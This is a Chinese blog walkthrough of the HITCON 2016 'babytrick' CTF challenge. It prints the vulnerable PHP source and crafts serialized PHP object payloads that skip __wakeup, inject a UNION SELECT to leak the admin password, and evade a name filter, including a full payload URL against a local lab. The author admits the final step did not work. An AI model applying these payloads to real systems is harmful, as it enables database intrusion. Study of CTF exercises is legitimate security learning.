安科网

[原题复现]-HITCON 2016 WEB《babytrick》[反序列化]

Bellboy

Bellboy

2020-01-31

关注 关注

前言

 不想复现的可以访问榆林学院信息安全协会CTF训练平台找到此题直接练手

HITCON 2016 WEB -babytrick(复现

原题

index.php

<?php

include "config.php";

class HITCON{
    private $method;
    private $args;
    private $conn;

    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;

        $this->__conn();
    }

    function show() {
        list($username) = func_get_args();
        $sql = sprintf("SELECT * FROM users WHERE username=‘%s‘", $username);

        $obj = $this->__query($sql);
        if ( $obj != false  ) {
            $this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
        } else {
            $this->__die("Nobody Nobody But You!");
        }
        
    }

    function login() {
        global $FLAG;

        list($username, $password) = func_get_args();
        $username = strtolower(trim(mysql_escape_string($username)));
        $password = strtolower(trim(mysql_escape_string($password)));

        $sql = sprintf("SELECT * FROM users WHERE username=‘%s‘ AND password=‘%s‘", $username, $password);

        if ( $username == ‘orange‘ || stripos($sql, ‘orange‘) != false ) {
            $this->__die("Orange is so shy. He do not want to see you.");
        }

        $obj = $this->__query($sql);
        if ( $obj != false && $obj->role == ‘admin‘  ) {
            $this->__die("Hi, Orange! Here is your flag: " . $FLAG);
        } else {
            $this->__die("Admin only!");
        }
    }

    function source() {
        highlight_file(__FILE__);
    }

    function __conn() {
        global $db_host, $db_name, $db_user, $db_pass, $DEBUG;

        if (!$this->conn)
            $this->conn = mysql_connect($db_host, $db_user, $db_pass);
        mysql_select_db($db_name, $this->conn);

        if ($DEBUG) {
            $sql = "CREATE TABLE IF NOT EXISTS users ( 
                        username VARCHAR(64), 
                        password VARCHAR(64), 
                        role VARCHAR(64)
                    ) CHARACTER SET utf8";
            $this->__query($sql, $back=false);

            $sql = "INSERT INTO users VALUES (‘orange‘, ‘$db_pass‘, ‘admin‘), (‘phddaa‘, ‘ddaa‘, ‘user‘)";
            $this->__query($sql, $back=false);
        } 

        mysql_query("SET names utf8");
        mysql_query("SET sql_mode = ‘strict_all_tables‘");
    }

    function __query($sql, $back=true) {
        $result = @mysql_query($sql);
        if ($back) {
            return @mysql_fetch_object($result);
        }
    }

    function __die($msg) {
        $this->__close();

        header("Content-Type: application/json");
        die( json_encode( array("msg"=> $msg) ) );
    }

    function __close() {
        mysql_close($this->conn);
    }

    function __destruct() {
        $this->__conn();

        if (in_array($this->method, array("show", "login", "source"))) {
            @call_user_func_array(array($this, $this->method), $this->args);
        } else {
            $this->__die("What do you do?");
        }

        $this->__close();
    }

    function __wakeup() {
        foreach($this->args as $k => $v) {
            $this->args[$k] = strtolower(trim(mysql_escape_string($v)));
        }
    }
}

if(isset($_GET["data"])) {
    @unserialize($_GET["data"]);    
} else {
    new HITCON("source", array());
}

 config.php

<?php

    $db_host = ‘localhost‘;
    $db_name = ‘babytrick‘;
    $db_user = ‘babytrick‘;
    $db_pass = ‘babytrick1234‘;

    $DEBUG = @$_GET[‘noggnogg‘];
    $FLAG = "HITCON{php 4nd mysq1 are s0 mag1c, isn‘t it?}";
?>

审计代码逻辑

这个里的代码将传进来的值赋给本地的私有变量(private)中

//当对象创建时会自动调用(但在unserialize()时是不会自动调用的)。

public function __construct($method, $args) {
        echo "__construct执行<br>";
        $this->method = $method;  //将传进来的$method 赋值给本地的method
        $this->args = $args;
 
        $this->__conn();
    }

当执行它

func_tet_args() //获取一个函数所有的参数

list() 函数用数组中的元素为一组变量赋值。

sprintf()把百分号(%)符号替换成一个作为参数进行传递的变量:

第四行代码 调用__query函数进行数据查询

第五行判断$obj里面是否有值 如果有则 执行第六行代码

第六行代码的意思是利用springtf()方法输出执行的username role的结果

function show() {
        list($username) = func_get_args();
        $sql = sprintf("SELECT * FROM users WHERE username=‘%s‘", $username);
        $obj = $this->__query($sql);
        if ( $obj != false  ) {
            $this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
        } else {
            $this->__die("Nobody Nobody But You!");
        }     
    }

 //stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写)

function login() {
        global $FLAG; //定义全局变量
        list($username, $password) = func_get_args();  //获取函数的参数的值赋值给$username,$password
        $username = strtolower(trim(mysql_escape_string($username))); //过滤$username mysql_escape_string()转义字符函数 
        $password = strtolower(trim(mysql_escape_string($password))); //过滤$password
 
        $sql = sprintf("SELECT * FROM users WHERE username=‘%s‘ AND password=‘%s‘", $username, $password); //进行查询

      
        if ( $username == ‘orange‘ || stripos($sql, ‘orange‘) != false ) {                //特殊字符Ã绕过;
            $this->__die("Orange is so shy. He do not want to see you.");
        }
     

        $obj = $this->__query($sql); //将查询结果赋值给$obj
     
        if ( $obj != false && $obj->role == ‘admin‘  ) { //如果$obj里面有值并且查询结果里面的role等于admin则执行if里面的语句否则执行else里面的
            $this->__die("Hi, Orange! Here is your flag: " . $FLAG);//flag在这里!!!!!
        } else {
            $this->__die("Admin only!");
        }
    }
function source() {
        highlight_file(__FILE__);
    }
function __conn() {global $db_host, $db_name, $db_user, $db_pass, $DEBUG;
         
        if (!$this->conn)
            $this->conn = mysql_connect($db_host, $db_user, $db_pass);
        mysql_select_db($db_name, $this->conn);
         
        if ($DEBUG) {
            print"=====";
            $sql = "CREATE TABLE IF NOT EXISTS users ( 
                        username VARCHAR(64), 
                        password VARCHAR(64), 
                        role VARCHAR(64)
                    ) CHARACTER SET utf8";
            $this->__query($sql, $back=false);
 
            $sql = "INSERT INTO users VALUES (‘orange‘, ‘$db_pass‘, ‘admin‘), (‘phddaa‘, ‘ddaa‘, ‘user‘)";
            $this->__query($sql, $back=false);
        } 
 
        mysql_query("SET names utf8");                          //使用utf8编码方式
        mysql_query("SET sql_mode = ‘strict_all_tables‘");
    }
function __query($sql, $back=true) {$result = @mysql_query($sql);
        if ($back) {
            return @mysql_fetch_object($result);
        }
    }
function __die($msg) {
        echo "函数die()执行<br>";
        $this->__close();
 
        header("Content-Type: application/json");
        die( json_encode( array("msg"=> $msg) ) );
    }

关闭数据库函数

function __close() {
        echo "函数close()执行<br>";
        mysql_close($this->conn);
    }
__destruct():当对象被销毁时会自动调用。call_user_func_array : 调用回调函数,并把一个数组参数作为回调函数的参数。
function __destruct() {
echo "__destruct执行<br>";
$this->__conn(); //将数据写入数据库;

if (in_array($this->method, array("show", "login", "source"))) {  //检查当前method看看和array里面有没有匹配的如果有则执行if里面的语句
@call_user_func_array(array($this, $this->method), $this->args);//调用$this->method里面的方法,把$this->args里面的额参数当成$this->method里面的参数使用
} else { $this->__die("What do you do?"); } $this->__close(); }//否则....
 
unserialize()时会自动调用mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
function __wakeup() {foreach($this->args as $k => $v) {
            $this->args[$k] = strtolower(trim(mysql_escape_string($v))); //过滤所有的参数(转义所有的SQL字符、去除所有的空格 小写转换)
        }
    }
if(isset($_GET["data"])) {                        //侦测有无data的get获取;
    @unserialize($_GET["data"]);                  //跳过 __wakeup()函数;调用析构函数
} else {
    new HITCON("source", array());
}

通过分析得知我们首先要获取到账户和密码才能进行下一步的登陆获得flag

构造的序列化代码

$_method="show";
$_args=array("bla‘ union select password,username,role from users where username=‘orange‘ -- ");
$Instantiation=new HITCON("show",$_args);
echo serialize($Instantiation)."</br>";
序列化得出结果//O:6:"HITCON":3:{s:14:"HITCONmethod";s:4:"show";s:12:"HITCONargs";a:1:{i:0;s:79:"bla‘ union select password,username,role from users where username=‘orange‘ -- ";}s:12:"HITCONconn";i:0;}
因为里面有私有变量所以给私有变量加上%00格式
//O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:79:"bla‘ union select password,username,role from users where username=‘orange‘ -- ";}s:12:"%00HITCON%00conn";i:0;}
//将属性值3变成4绕过_wakeup函数
//O:6:"HITCON":4:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:79:"bla‘ union select password,username,role from users where username=‘orange‘ -- ";}s:12:"%00HITCON%00conn";i:0;}

payload:

http://127.0.0.1/test/index.php?data=O:6:"HITCON":4:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:79:"bla‘ union select password,username,role from users where username=‘orange‘ -- ";}s:12:"%00HITCON%00conn";i:0;}

[原题复现]-HITCON 2016 WEB《babytrick》[反序列化]

构造序列化的代码2

$_method="login";
$_args=array("or?nge","admin");
$Instantiation=new HITCON($_method,$_args);
echo serialize($Instantiation)."</br>";
$Instantiation=null;
//序列化后
O:6:"HITCON":4:{s:14:"HITCONmethod";s:5:"login";s:12:"HITCONargs";a:2:{i:0;s:6:"orange";i:1;s:5:"admin";}s:12:"%00HITCON%00conn";i:0;}
//给私有变量添加%00格式
O:6:"HITCON":4:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:6:"orange";i:1;s:5:"admin";}s:12:"%00HITCON%00conn";i:0;}
//替换orange里面的a为Ã 绕过下方注释的的代码
O:6:"HITCON":4:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:6:"orÃnge";i:1;s:5:"admin";}s:12:"%00HITCON%00conn";i:0;}

[原题复现]-HITCON 2016 WEB《babytrick》[反序列化]

遇到的问题  1.绕不过去  还有就是数据库表有问题  脑子很混乱先写这些  下来再研究 先去看会电影。。。。

前言

111

前言

111

前言

序列化 信息安全

Bellboy

Bellboy

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

golang的序列化与反序列化的几种方式

golang用来序列化的模块有很多,我们来介绍3个。首先登场的是json,这个几乎毋庸置疑。"Where": "东方地灵殿",当然golang的大小写我们知道是具有含义的,如果改成小写, 那么该字段是无法被序列化的。

Lzs 2020-10-23

Apache Shiro 反序列化(CVE-2016-4437)复现

shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操

xclxcl 2020-08-03

Apache Shiro 反序列化(CVE-2016-4437)复现

shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操

zmzmmf 2020-08-03

21天学习python编程_pickle模块序列化与反序列化

如果看完这篇文章,你还是弄不明白pickle操作;你来找我,我保证不打你,我给你发100的大红包。pickle模块实现了用于序列化和反序列化Python对象结构的二进制协议;序列化:将Python对象转成字节流;反序列化:将字节流转成Python对象;JS

葫芦小金刚 2020-07-22

Redis

RedisTemplate redisTemplate = new RedisTemplate();ObjectMapper objectMapper = new ObjectMapper();return redisTemplate;

ericdoug 2020-07-18

Linux编程:--项目应用层协议设计和序列化与反序列

而不是说客户端和服务器端之前?主流序列化协议主流序列化协议:XML 指可扩展标记语言。

Erick 2020-06-25

关于对象序列化

序列化是指将对象转换成可传输或可存储的形式的过程。常见的如文件存储,网络传输。不同的序列化方式得到的结果也不近相同。反序列化使用存储或传输内容重新创建对象的过程。但直观和通用的同时也带来了性能差的缺点。信息冗余了很多,键值对方面,会有重复的key值。我们就

Erick 2020-06-17

297. 二叉树的序列化与反序列化.

序列化是将一个数据结构或者对象转换为连续的比特位的操作,进而可以将转换后的数据存储在一个文件或者内存中,同时也可以通过网络传输到另一个计算机环境,采取相反方式重构得到原数据。请设计一个算法来实现二叉树的序列化与反序列化。这里不限定你的序列 / 反序列化算法

aanndd 2020-06-16

【序列化与反序列化】Java原生 &amp; Hessian &amp; protobuf

"); //写入字面值常量。System.out.println; //读取字面值常量。Customer obj3 = in.readObject(); //读取customer对象。// 序列化public static &

Erick 2020-06-17

[Notes] 2020.6.16 每日一题 二叉树的序列化与反序列化

序列化是将一个数据结构或者对象转换为连续的比特位的操作,进而可以将转换后的数据存储在一个文件或者内存中,同时也可以通过网络传输到另一个计算机环境,采取相反方式重构得到原数据。请设计一个算法来实现二叉树的序列化与反序列化。这与 LeetCode 目前使用的方

aanndd 2020-06-16

详解php反序列化

“所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。”在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据

xuebingnan 2020-06-13

fastjson&lt;=1.2.47-反序列化漏洞-命令执行-漏洞复现

  Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。并且在Fastjson 1.2.47及以下版本中,利用

80337960 2020-06-10

DJango反序列化器的参数效验

serializer = UserSerializer# 传入对象集时需指定many=True. 在序列化器字段中加入validator选项参数,为列表形式,值为函数名。②调用save时,如果有传instance实例,则调用update方法更新数据,否则调

Jerry 2020-06-01

python json and pickle

import json,picklejson.dumps()#序列化,字典转换成字符串,只dumps一次json.loads()#反序列化,字符串转换字典pickle.dumps()#序列化,转换成2进制pickle.loads()pickle.dump#

mengdg000 2020-05-29

RedisTemplate 序列化问题

spring-data-redis RedisTemplate 操作redis时发现存储在redis中的key不是设置的string值,前面还多出了许多类似\xac\xed\x00\x05t\x00;

尹小鱼 2020-05-29

ListJson序列化与反序列化特定类型--Unity版

在github上有项目网址,下载新的release版本。在Unity中创建Plugins文件夹,把下好的dll文件放入到Plugins文件夹中既可以了。支持C#中几乎所有的类型。但Unity中的例如Vector2、3,Quaternion以及Matrix4

somebodyoneday 2020-05-15

Shiro反序列化漏洞检测、dnslog

pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode(). encryptor = AES.new(base64.b64decode(key), mode, iv).

visionzheng 2020-05-05

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cookie. python shiro_shell.py

visionzheng 2020-05-04

php反序列化漏洞-咖面Amber

echo ‘Person: ‘.$this->name.‘is ‘.$this->age.‘years old <br/>‘;序列化一个对象将会保存对象的所有变量, 但是不会保存对象的方法,只会保存类的名字。php反序列化漏洞又称对

igogo00 2020-05-03

序列化与反序列化

"}\n";List value = (List) map.get(key);System.out.println("key:" + key);Gson gson = new Gson();LoggerSwitch

nalanrumeng 2020-05-02
Bellboy

Bellboy

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号